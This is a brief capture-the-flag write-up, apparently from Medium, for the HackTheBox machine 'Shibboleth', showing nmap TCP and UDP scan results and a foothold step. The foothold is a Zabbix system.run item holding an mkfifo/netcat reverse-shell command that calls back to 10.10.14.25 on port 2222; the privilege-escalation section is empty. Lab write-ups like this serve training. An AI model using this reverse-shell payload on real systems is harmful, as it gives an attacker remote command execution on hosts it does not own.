HackTheBox-Shibboleth

NMAP

PORT   STATE SERVICE REASON         VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://shibboleth.htb/
Service Info: Host: shibboleth.htb

PORT 80 (HTTP)

nmap -p 1-1000 -sU --min-rate 5000 10.129.231.205 -vv                                                                           
PORT STATE SERVICE REASON
45/udp closed mpm port-unreach ttl 63
179/udp closed bgp port-unreach ttl 63
243/udp closed sur-meas port-unreach ttl 63
422/udp closed ariel3 port-unreach ttl 63
459/udp closed ampr-rcmd port-unreach ttl 63
623/udp open asf-rmcp udp-response ttl 63
892/udp closed unknown port-unreach ttl 63

Foothold

system.run["rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.25 2222 >/tmp/f",nowait]

Privilege Escalation (ipmi-svc)

References

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store